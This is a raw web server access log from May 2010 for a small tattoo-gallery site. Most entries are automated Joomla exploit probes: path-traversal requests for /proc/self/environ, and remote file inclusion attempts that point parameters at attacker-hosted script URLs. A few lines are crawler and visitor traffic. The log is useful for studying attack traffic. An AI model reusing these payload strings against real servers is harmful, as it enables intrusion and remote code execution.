94.23.0.30 - - [30/May/2010:20:35:27 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:35:27 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [30/May/2010:20:35:28 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:35:28 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [30/May/2010:20:35:51 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:35:52 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
69.175.75.82 - - [30/May/2010:20:36:05 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:36:05 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:36:35 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:36:36 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [30/May/2010:20:37:13 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:37:14 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
193.41.235.46 - - [30/May/2010:20:37:49 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:37:49 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [30/May/2010:20:37:53 -0500] "GET /logs/*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:37:53 -0500] "GET /*.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
66.246.72.178 - - [30/May/2010:20:39:25 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.246.72.178 - - [30/May/2010:20:39:25 -0500] "GET /logs/access_log.1271548800/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.246.72.178 - - [30/May/2010:20:39:25 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.46.13.44 - - [30/May/2010:20:41:56 -0500] "GET /logs/access_log.1159401600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.75.82 - - [30/May/2010:20:42:10 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:42:10 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:42:40 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:42:41 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
118.129.167.25 - - [30/May/2010:20:43:16 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:43:16 -0500] "GET /logs/access_log.1271289600//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:43:16 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:43:32 -0500] "GET /logs/access_log.1270684800//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:20:44:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [30/May/2010:20:45:24 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.246.72.178 - - [30/May/2010:20:45:42 -0500] "GET /logs/access_log.1271635200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
66.246.72.178 - - [30/May/2010:20:45:46 -0500] "GET /logs/access_log.1270771200/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:45:47 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:45:47 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:45:48 -0500] "GET /logs/access_log.1271289600//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
118.129.167.25 - - [30/May/2010:20:46:07 -0500] "GET /logs/access_log.1270684800//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:49 -0500] "GET //estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:49 -0500] "GET /logs//estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:49 -0500] "GET /logs/access_log.1271894400//estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:54 -0500] "GET /logs/access_log.1271894400//estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 343 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:54 -0500] "GET /logs//estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:20:46:54 -0500] "GET //estrutura/enquetes/comments.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 316 "-""Mozilla/5.0"
208.110.132.7 - - [30/May/2010:20:48:33 -0500] "GET /logs/access_log.1274313600/install/index.php?lng=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.810"
208.110.132.7 - - [30/May/2010:20:48:33 -0500] "GET /install/index.php?lng=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.810"
208.110.132.7 - - [30/May/2010:20:48:34 -0500] "GET /logs/install/index.php?lng=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:52:45 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:52:45 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:52:46 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.145.108.230 - - [30/May/2010:20:52:46 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:52:47 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:52:47 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:52:48 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:52:49 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
94.23.0.30 - - [30/May/2010:20:52:49 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.0.30 - - [30/May/2010:20:52:49 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
69.175.75.82 - - [30/May/2010:20:52:49 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.75.82 - - [30/May/2010:20:52:49 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
80.233.172.42 - - [30/May/2010:20:52:50 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
80.233.172.42 - - [30/May/2010:20:52:50 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
193.41.235.46 - - [30/May/2010:20:52:50 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
193.41.235.46 - - [30/May/2010:20:52:51 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
192.167.114.31 - - [30/May/2010:20:53:07 -0500] "GET /logs/*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.820"
192.167.114.31 - - [30/May/2010:20:53:07 -0500] "GET /*.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.820"
74.55.65.134 - - [30/May/2010:20:53:14 -0500] "GET /logs/access_log.1273622400///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:53:15 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:20:53:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
216.15.238.210 - - [30/May/2010:20:54:19 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.55.65.134 - - [30/May/2010:20:55:00 -0500] "GET /logs/access_log.1274313600///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:20:55:54 -0500] "GET /logs/access_log.1273622400///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:20:55:54 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:20:55:54 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
208.43.48.82 - - [30/May/2010:20:57:01 -0500] "GET /logs/zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:20:57:01 -0500] "GET /zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:20:57:01 -0500] "GET /logs/zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:20:57:01 -0500] "GET /zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:20:57:07 -0500] "GET /logs/zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 305 "-""libwww-perl/5.836"
208.43.48.82 - - [30/May/2010:20:57:07 -0500] "GET /zipndownload.php?PP_PATH=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.836"
190.152.145.54 - - [30/May/2010:20:57:36 -0500] "GET //?mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:20:57:36 -0500] "GET /logs/access_log.1271548800//?mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
190.152.145.54 - - [30/May/2010:20:57:36 -0500] "GET /logs//?mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
67.228.226.12 - - [30/May/2010:20:58:12 -0500] "GET /logs/access_log.1274313600///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
207.46.13.135 - - [30/May/2010:20:58:26 -0500] "GET /logs/access_log.1251331200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [30/May/2010:21:00:15 -0500] "GET /logs/access_log.1208563200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
24.22.42.203 - - [30/May/2010:21:03:41 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&source=hp&q=earl+brown+tattoo+flash&cts=1275271372581&aq=f&aqi=&aql=&oq=&gs_rfai=CsOey9BgDTPDUB5TuzASs6pieBQAAAKoEBU_Q6PwE""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:41 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:51 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:03:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
24.22.42.203 - - [30/May/2010:21:04:16 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; WinNT-EVI 05.03.2010)"
